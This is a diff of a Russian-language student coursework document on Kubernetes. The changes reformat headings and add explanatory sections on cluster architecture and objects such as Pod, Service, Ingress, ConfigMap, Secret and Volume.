--- a/CW/OS/Курсовая_ОС_Kubernetes_Михайлич.docx
+++ b/CW/OS/Курсовая_ОС_Kubernetes_Михайлич.docx
@@ -2218,6 +2218,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="0"/>
         </w:numPr>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:bookmarkStart w:id="3" w:name="_Toc518292916"/>
       <w:bookmarkStart w:id="4" w:name="_Toc210601673"/>
@@ -2228,10 +2229,10 @@
       <w:bookmarkEnd w:id="3"/>
       <w:bookmarkEnd w:id="4"/>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:ind w:left="1134" w:hanging="283"/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
       </w:pPr>
       <w:r>
         <w:t>Цель работы</w:t>
@@ -2259,44 +2260,56 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:ind w:left="1134" w:hanging="283"/>
+        <w:pStyle w:val="Beginingtitlelist"/>
       </w:pPr>
       <w:r>
         <w:t>Актуальность темы.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">В связи с трендом перехода от монолитной архитектуры к микросервисной и ростом популяронсти контейнеров, появился спрос на оркестровщики, которые дают функционал для управления большим числом независимых </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">В связи с трендом перехода от монолитной архитектуры к микросервисной и ростом популяронсти контейнеров, появился спрос на оркестровщики, которые дают функционал для управления большим числом независимых </w:t>
+        <w:t>docker</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">контейнеров. Самым популярным средством оркестровки контейнеров является </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>docker</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">контейнеров. Самым популярным средством оркестровки контейнеров является </w:t>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">С точки зрения безопасности, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Kubernetes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">С точки зрения безопасности, </w:t>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">позволяет централизованно управлять защитой </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">независимых контейнеров. Также </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2308,33 +2321,18 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">позволяет централизованно управлять защитой </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">независимых контейнеров. Также </w:t>
+        <w:t>имеет изолированные компоненты, например для взаимодействий между контейнерами и хранения конфиденциальной информации.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Так как компоненты </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Kubernetes</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>имеет изолированные компоненты, например для взаимодействий между контейнерами и хранения конфиденциальной информации.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Так как компоненты </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t xml:space="preserve">Kubernetes </w:t>
       </w:r>
       <w:r>
@@ -2343,8 +2341,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:ind w:left="1134" w:hanging="283"/>
+        <w:pStyle w:val="Beginingtitlelist"/>
       </w:pPr>
       <w:r>
         <w:t>Задачи</w:t>
@@ -2512,6 +2509,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="0" w:firstLine="0"/>
         <w:rPr>
           <w:bCs/>
         </w:rPr>
@@ -2569,8 +2571,708 @@
         <w:t xml:space="preserve"> позволяет удобно масштабировать инфраструктуру и предоставляет управление контейнерами через различные компоненты. Это предоставляет удобный контроль всей инфраструктуры приложений и является основой для построение системы микросервисов, тренд на которые набирает огромную популярность. </w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Использование самих контейнеров дает возможность запускать приложения в изолированных средах со вссеми необходимыми зависимостями. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">в свою очередь, собирает все контейнеры приложений в единый кластер. Компоненты </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>дают возможность гибкого управления над кластером, что повышает отказоустойчивость системы.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">применяется для развертывания приложений, их масштабирования, контроля нагрузки на инфраструктуру, управления ресурсами, а также оркестрации системы контейнеров приложений. Основное преимущество </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>заключается в систематизировании инфраструктуры проекта, а также предосавлении гибкого контроля и настройки системы и ее простого масштабирования.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:ind w:left="0" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">архитектура </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Архитекрута </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>построена по принципу мастер-узел, в которой присутствует главная нода</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>а также рабочие ноды</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, которые регулируются с помощью компонент контроля </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Каждая нода представляет собой виртуальную или физическую машину.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Главная нода</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Главная нода </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">центральный узел рабочего кластера </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">который отвечает за </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">взаимодействия рабочих нод с сервером, планировку контейнеров, логирование рабочих нод, а также </w:t>
+      </w:r>
+      <w:r>
+        <w:t>резервного хранения данных.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Основные компоненты главной ноды:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>API</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">контейнер с окружением кластера </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>K</w:t>
+      </w:r>
+      <w:r>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Controller</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>manager</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>контейнер</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>с</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>таймлайном</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>работы кластера</w:t>
+      </w:r>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Scheduler</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>контейнер-планировщик, определяющий рабочую ноду для запуска контейнера</w:t>
+      </w:r>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ETCD –</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> резервное хранилище кластера.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Рабочая нода</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Рабочая нода - придаточный узел кластера, в котором находится контейнеры для приложения. Управляется компонентами </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Основные компоненты рабочей ноды:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Docker</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> контейнеры (приложение, БД)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Kubelet </w:t>
+      </w:r>
+      <w:r>
+        <w:t>процесс</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:left="709"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:left="709"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Для тонкой настройки рабочих нод существуют компоненты </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Pod</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Pod</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – абстракция, находящаяся над нодой, которая запускает и изолирует группу контейнеров, находящихся в ноде и дает возможность контроля для определенной части инфраструктуры. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pod </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">является наименьшей единицей развертывания в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Service</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Service</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>абстракция, находящаяся над подами</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, которая обеспечивает коммуникацию между этими подами, а также имеет возможность выделить для нескольких подов статический </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>адресс.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">объект </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>API</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">который управляет внешним трафиком, а также маршрутизирует его к сервису ноды. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>позволяет оптимально распределить весь трафик по всем необходимым сервисам.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ConfigMap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ConfigMap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>внешняя конфигурация приложения, которая служит для хранения настроек всего кластера.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ConfigMap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>служит для хранения только публичной информации.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">объект кластера, который служит для хранения конфидециальных данных с возможностью их использования. Все данные </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>secrets</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">хранятся в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ETCD</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>сервера в незашифрованном виде.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Beginingtitlelist"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">объект </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">который служит для связи с внешними дисками машины ноды. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Volume</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">предназначен для локального хранения информации внутри ноды. Также объект </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Volume </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">находитя вне самого кластера </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p/>
     <w:p/>
     <w:p/>
@@ -3164,6 +3866,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="0" w:firstLine="0"/>
       </w:pPr>
       <w:bookmarkStart w:id="6" w:name="_Toc210601677"/>
       <w:r>
@@ -3362,6 +4069,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -3757,6 +4468,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -3953,6 +4668,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
         <w:rPr>
           <w:bCs/>
         </w:rPr>
@@ -3979,6 +4698,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="0" w:firstLine="0"/>
       </w:pPr>
       <w:bookmarkStart w:id="10" w:name="_Toc210601681"/>
       <w:r>
@@ -4200,10 +4924,10 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:429pt;height:155.25pt" o:ole="">
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:429pt;height:155.25pt" o:ole="">
             <v:imagedata r:id="rId12" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.15" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1840555309" r:id="rId13"/>
+          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.15" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1840982167" r:id="rId13"/>
         </w:object>
       </w:r>
     </w:p>
@@ -4304,6 +5028,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="0" w:firstLine="0"/>
       </w:pPr>
       <w:bookmarkStart w:id="11" w:name="_Toc210601682"/>
       <w:r>
@@ -4880,6 +5609,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="0" w:firstLine="0"/>
       </w:pPr>
       <w:bookmarkStart w:id="12" w:name="_Toc210601683"/>
       <w:r>
@@ -5077,6 +5811,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -5460,6 +6198,10 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
@@ -6259,6 +7001,207 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="09274B4F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2120447E"/>
+    <w:lvl w:ilvl="0" w:tplc="2EA85474">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:pStyle w:val="ListParagraph"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1069" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2869" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04190005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3589" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04190001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4309" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
